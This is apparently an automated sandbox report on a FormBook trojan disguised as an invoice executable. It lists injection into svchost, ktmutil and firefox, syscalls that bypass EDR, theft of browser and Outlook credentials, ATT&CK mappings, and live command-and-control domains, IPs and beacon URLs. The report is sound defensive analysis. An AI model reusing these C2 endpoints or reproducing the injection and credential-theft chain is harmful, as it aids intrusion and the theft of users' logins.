                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03B04F68 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03AB4F40 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03AB4F40 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03AB4F40 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03AB4F40 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exe, Code function: 2_2_0022A66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exe, Code function: 2_2_002181AC SetUnhandledExceptionFilter,UnhandledExceptionFilter
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exe, Code function: 2_2_00218189 SetUnhandledExceptionFilter

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exe, NtResumeThread: Direct from: 0x773836AC
                Source: C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exe, NtMapViewOfSection: Direct from: 0x77382D1C
                Source: C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exe, NtWriteVirtualMemory: Direct from: 0x77382E3C
                Source: C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exe, NtProtectVirtualMemory: Direct from: 0x77382F9C
                Source: C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exe, NtSetInformationThread: Direct from: 0x773763F9
                Source: C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exe, NtCreateMutant: Direct from: 0x773835CC
                Source: C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exe, NtNotifyChangeKey: Direct from: 0x77383C2C
                Source: C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exe, NtTerminateProcess: Direct from: 0x77382D5C
                Source: C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exe, NtSetInformationProcess: Direct from: 0x77382C5C
                Source: C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exe, NtCreateUserProcess: Direct from: 0x7738371C
                Source: C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exe, NtQueryInformationProcess: Direct from: 0x77382C26
                Source: C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exe, NtResumeThread: Direct from: 0x77382FBC
                Source: C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exe, NtWriteVirtualMemory: Direct from: 0x7738490C
                Source: C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exe, NtAllocateVirtualMemory: Direct from: 0x77383C9C
                Source: C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exe, NtReadFile: Direct from: 0x77382ADC
                Source: C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exe, NtAllocateVirtualMemory: Direct from: 0x77382BFC
                Source: C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exe, NtDelayExecution: Direct from: 0x77382DDC
                Source: C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exe, NtQuerySystemInformation: Direct from: 0x77382DFC
                Source: C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exe, NtOpenSection: Direct from: 0x77382E0C
                Source: C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exe, NtQueryVolumeInformationFile: Direct from: 0x77382F2C
                Source: C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exe, NtQuerySystemInformation: Direct from: 0x773848CC
                Source: C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exe, NtReadVirtualMemory: Direct from: 0x77382E8C
                Source: C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exe, NtCreateKey: Direct from: 0x77382C6C
                Source: C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exe, NtClose: Direct from: 0x77382B6C
                Source: C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exe, NtAllocateVirtualMemory: Direct from: 0x773848EC
                Source: C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exe, NtQueryAttributesFile: Direct from: 0x77382E6C
                Source: C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exe, NtSetInformationThread: Direct from: 0x77382B4C
                Source: C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exe, NtTerminateThread: Direct from: 0x77382FCC
                Source: C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exe, NtQueryInformationToken: Direct from: 0x77382CAC
                Source: C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exe, NtOpenKeyEx: Direct from: 0x77382B9C
                Source: C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exe, NtAllocateVirtualMemory: Direct from: 0x77382BEC
                Source: C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exeNtDeviceIoControlFile: Direct from: 0x77382AECJump to behavior
                Source: C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exeNtCreateFile: Direct from: 0x77382FECJump to behavior
                Source: C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exeNtOpenFile: Direct from: 0x77382DCCJump to behavior
                Source: C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exeNtProtectVirtualMemory: Direct from: 0x77377B2EJump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exe | Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Windows\SysWOW64\ktmutil.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\ktmutil.exe | Section loaded: NULL target: C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exe protection: read write
Source: C:\Windows\SysWOW64\ktmutil.exe | Section loaded: NULL target: C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\ktmutil.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
Source: C:\Windows\SysWOW64\ktmutil.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\ktmutil.exe | Thread register set: target process: 4048
Source: C:\Windows\SysWOW64\ktmutil.exe | Thread APC queued: target process: C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exe
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 30DF008
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exe | Code function: 2_2_0022B106 LogonUserW
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exe | Code function: 2_2_001F3D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exe | Code function: 2_2_0023411C SendInput,keybd_event
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exe | Code function: 2_2_002374BB mouse_event
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exe"
Source: C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exe | Process created: C:\Windows\SysWOW64\srdelayed.exe "C:\Windows\SysWOW64\srdelayed.exe"
Source: C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exe | Process created: C:\Windows\SysWOW64\ktmutil.exe "C:\Windows\SysWOW64\ktmutil.exe"
Source: C:\Windows\SysWOW64\ktmutil.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exe | Code function: 2_2_0022A66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exe | Code function: 2_2_002371FA AllocateAndInitializeSid,CheckTokenMembership,FreeSid
Source: tOxaspWNamv.exe, 00000008.00000002.3407307546.0000000001330000.00000002.00000001.00040000.00000000.sdmp, tOxaspWNamv.exe, 00000008.00000000.2409707120.0000000001330000.00000002.00000001.00040000.00000000.sdmp, tOxaspWNamv.exe, 0000000E.00000002.3409760212.0000000000FA0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: IProgram Manager
Source: ORIGINAL INVOICE COAU7230734290.exe, tOxaspWNamv.exe, 00000008.00000002.3407307546.0000000001330000.00000002.00000001.00040000.00000000.sdmp, tOxaspWNamv.exe, 00000008.00000000.2409707120.0000000001330000.00000002.00000001.00040000.00000000.sdmp, tOxaspWNamv.exe, 0000000E.00000002.3409760212.0000000000FA0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
Source: tOxaspWNamv.exe, 00000008.00000002.3407307546.0000000001330000.00000002.00000001.00040000.00000000.sdmp, tOxaspWNamv.exe, 00000008.00000000.2409707120.0000000001330000.00000002.00000001.00040000.00000000.sdmp, tOxaspWNamv.exe, 0000000E.00000002.3409760212.0000000000FA0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
Source: ORIGINAL INVOICE COAU7230734290.exe | Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndTHISREMOVEblankinfoquestionstopwarning
Source: tOxaspWNamv.exe, 00000008.00000002.3407307546.0000000001330000.00000002.00000001.00040000.00000000.sdmp, tOxaspWNamv.exe, 00000008.00000000.2409707120.0000000001330000.00000002.00000001.00040000.00000000.sdmp, tOxaspWNamv.exe, 0000000E.00000002.3409760212.0000000000FA0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exe | Code function: 2_2_002165C4 cpuid
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exe | Code function: 2_2_0024091D GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,__wsplitpath,_wcscat,_wcscat,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,_wcscpy,SetCurrentDirectoryW
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exe | Code function: 2_2_0026B340 GetUserNameW
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exe | Code function: 2_2_00221E8E __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exe | Code function: 2_2_0020DDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo

Stealing of Sensitive Information

Source: Yara match | File source: 4.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000E.00000002.3408793565.0000000000D80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2493193897.0000000002F90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2493863404.0000000005B50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.3397246670.0000000002780000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2492860834.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.3409182554.0000000004790000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.3409416368.0000000002E70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.3409702511.0000000002EC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\ktmutil.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\ktmutil.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\ktmutil.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
Source: C:\Windows\SysWOW64\ktmutil.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\SysWOW64\ktmutil.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\ktmutil.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Windows\SysWOW64\ktmutil.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
Source: C:\Windows\SysWOW64\ktmutil.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\ktmutil.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
Source: ORIGINAL INVOICE COAU7230734290.exe | Binary or memory string: WIN_81
Source: ORIGINAL INVOICE COAU7230734290.exe | Binary or memory string: WIN_XP
Source: ORIGINAL INVOICE COAU7230734290.exe | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 12, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubytep
Source: ORIGINAL INVOICE COAU7230734290.exe | Binary or memory string: WIN_XPe
Source: ORIGINAL INVOICE COAU7230734290.exe | Binary or memory string: WIN_VISTA
Source: ORIGINAL INVOICE COAU7230734290.exe | Binary or memory string: WIN_7
Source: ORIGINAL INVOICE COAU7230734290.exe | Binary or memory string: WIN_8

Remote Access Functionality

Source: Yara match | File source: 4.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000E.00000002.3408793565.0000000000D80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2493193897.0000000002F90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2493863404.0000000005B50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.3397246670.0000000002780000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2492860834.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.3409182554.0000000004790000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.3409416368.0000000002E70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.3409702511.0000000002EC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exe | Code function: 2_2_00248C4F socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exe | Code function: 2_2_0024923B socket,WSAGetLastError,bind,WSAGetLastError,closesocket
MITRE ATT&CK matrix, rebuilt from the flattened grid. Each tactic lists its nine cells in the original row order; the number in parentheses is the count badge shown beside that technique in the original matrix, reproduced as extracted. Cells without a badge are the matrix's unmatched placeholder techniques.

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
Initial Access: Valid Accounts (2); Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
Execution: Native API (3); Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
Persistence: DLL Side-Loading (1); Valid Accounts (2); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Privilege Escalation: Exploitation for Privilege Escalation (1); Abuse Elevation Control Mechanism (1); DLL Side-Loading (1); Valid Accounts (2); Access Token Manipulation (21); Process Injection (412); Startup Items; Scheduled Task/Job; At
Defense Evasion: Disable or Modify Tools (1); Deobfuscate/Decode Files or Information (1); Abuse Elevation Control Mechanism (1); Obfuscated Files or Information (3); DLL Side-Loading (1); Valid Accounts (2); Virtualization/Sandbox Evasion (2); Access Token Manipulation (21); Process Injection (412)
Credential Access: OS Credential Dumping (1); Input Capture (21); Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
Discovery: System Time Discovery (2); Account Discovery (1); File and Directory Discovery (2); System Information Discovery (116); Security Software Discovery (151); Virtualization/Sandbox Evasion (2); Process Discovery (3); Application Window Discovery (11); System Owner/User Discovery (1)
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
Collection: Archive Collected Data (1); Data from Local System (1); Email Collection (1); Input Capture (21); Clipboard Data (3); GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
Command and Control: Ingress Tool Transfer (4); Encrypted Channel (1); Non-Application Layer Protocol (4); Application Layer Protocol (4); Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Impact: System Shutdown/Reboot (1); Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement

Legend (behavior graph icons):

• Process
• Signature
• Created File
• DNS/IP Info
• Is Dropped
• Is Windows Process
• Number of created Registry Values
• Number of created Files
• Visual Basic
• Delphi
• Java
• .Net C# or VB.NET
• C, C++ or other language
• Is malicious
• Internet
Behavior Graph ID: 1562307; Sample: ORIGINAL INVOICE COAU723073...; Start date: 25/11/2024; Architecture: WINDOWS; Score: 100. The graph serialization is rebuilt below as a process tree; count badges on process nodes are reproduced as extracted.

Top-level DNS/IP nodes: www.schedulemassage.xyz; www.huiguang.xyz (Performs DNS queries to domains with low reputation); 8 other IPs or domains
Top-level signatures: Suricata IDS alerts for network traffic; Multi AV Scanner detection for submitted file; Yara detected FormBook; 5 other signatures

ORIGINAL INVOICE COAU7230734290.exe [2] (started)
    signatures: Binary is likely a compiled AutoIt script file; Writes to foreign memory regions; Maps a DLL or memory area into another process
    -> svchost.exe (started)
        signatures: Maps a DLL or memory area into another process
        -> tOxaspWNamv.exe (injected)
            signatures: Found direct / indirect Syscall (likely to bypass EDR)
            -> ktmutil.exe [13] (started)
                signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 3 other signatures
                -> tOxaspWNamv.exe (injected)
                    signatures: Found direct / indirect Syscall (likely to bypass EDR)
                    network: schedulemassage.xyz 3.33.130.190, ports 49866, 49874, 49883 (AMAZONEXPANSIONGB, United States); www.futurevision.life 203.161.49.193, ports 49906, 49913, 49919 (VNPT-AS-VNVNPTCorpVN, Malaysia); www.huiguang.xyz 154.216.76.80, ports 49827, 80 (POWERLINE-AS-APPOWERLINEDATACENTERHK, Seychelles)
                -> firefox.exe (started)
            -> srdelayed.exe (started)

Source | Detection | Scanner | Label
ORIGINAL INVOICE COAU7230734290.exe | 68% | ReversingLabs | Win32.Trojan.AutoitInject
ORIGINAL INVOICE COAU7230734290.exe | 100% | Joe Sandbox ML |
No Antivirus matches
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label
http://www.huiguang.xyz/hv6g/?Hx=ot9h&yX7=vSitAQgQO9xnWjtJgvvZZsk+23T/NzOm/sAr3nzbW6mT0FGB0/NYbIaPlj7BCWSFPaPgTx5lzENVl3g1chzGBem8ABx5elB2IpCI9aOC0eTdsykMK9iQYMJsZcXRFR0PJFreT4Q= | 0% | Avira URL Cloud | safe
http://www.futurevision.life/hxmz/ | 0% | Avira URL Cloud | safe
http://www.mcfunding.org/0598/ | 0% | Avira URL Cloud | safe
http://www.beingandbecoming.ltd/79tr/?yX7=vB4016rwfH0MxtawL3zGYGaXYsIh8iPne8uh+mnoHReWloNmM7dp4Fgr6wtK7PtcWtNvsE0Cpt3tQWtVQrZPygs+MxIMUNH2akCfN7/CzpsZyLj6qmJ1F1UuDNbdqvUipDEiTgU=&Hx=ot9h | 0% | Avira URL Cloud | safe
http://www.beingandbecoming.ltd/79tr/ | 0% | Avira URL Cloud | safe
http://www.mcfunding.org/0598/?yX7=t68BN09iVeqb/IuLF1oa7LGDO07/W7CFIoocHQs3lozqg6PiE4irZB+dVkRcNKn3qqYTfz+U2KKskdRsvGv4Tu+XiR6NXotGry9ANEeeRCoN4FhbxnBZSnIhm0SzK0MisIZlDjM=&Hx=ot9h | 0% | Avira URL Cloud | safe
http://www.futurevision.life/hxmz/?Hx=ot9h&yX7=xeYt+TVrluKccowhuJaDBktUUZBiwtnijwrYeJgffsaeXHWEwE1YZCbtIyEm+ckVl2hmk1+GOFDMCTsPe0H768cQaPGnwmWpoBoTXnujTk0fw5ooQYelqhpppqeWfG8SjK30Qts= | 0% | Avira URL Cloud | safe
http://www.mcfunding.org | 0% | Avira URL Cloud | safe
https://34.92.79.175:19817 | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Reputation
(No antivirus detection is listed for any of these domains.)
mcfunding.org | 3.33.130.190 | true | true | unknown
www.huiguang.xyz | 154.216.76.80 | true | false | high
beingandbecoming.ltd | 3.33.130.190 | true | true | unknown
migorengya8.click | 198.252.98.54 | true | true | unknown
fp2e7a.wpc.phicdn.net | 192.229.221.95 | true | false | high
www.futurevision.life | 203.161.49.193 | true | false | high
schedulemassage.xyz | 3.33.130.190 | true | true | unknown
www.beingandbecoming.ltd | unknown | unknown | false | unknown
www.migorengya8.click | unknown | unknown | false | unknown
www.mcfunding.org | unknown | unknown | false | unknown
www.schedulemassage.xyz | unknown | unknown | true | unknown
Name | Malicious | Antivirus Detection | Reputation
(Every URL below is flagged malicious by the analysis while Avira URL Cloud rates it "safe".)
http://www.futurevision.life/hxmz/?Hx=ot9h&yX7=xeYt+TVrluKccowhuJaDBktUUZBiwtnijwrYeJgffsaeXHWEwE1YZCbtIyEm+ckVl2hmk1+GOFDMCTsPe0H768cQaPGnwmWpoBoTXnujTk0fw5ooQYelqhpppqeWfG8SjK30Qts= | true | Avira URL Cloud: safe | unknown
http://www.mcfunding.org/0598/ | true | Avira URL Cloud: safe | unknown
http://www.futurevision.life/hxmz/ | true | Avira URL Cloud: safe | unknown
http://www.mcfunding.org/0598/?yX7=t68BN09iVeqb/IuLF1oa7LGDO07/W7CFIoocHQs3lozqg6PiE4irZB+dVkRcNKn3qqYTfz+U2KKskdRsvGv4Tu+XiR6NXotGry9ANEeeRCoN4FhbxnBZSnIhm0SzK0MisIZlDjM=&Hx=ot9h | true | Avira URL Cloud: safe | unknown
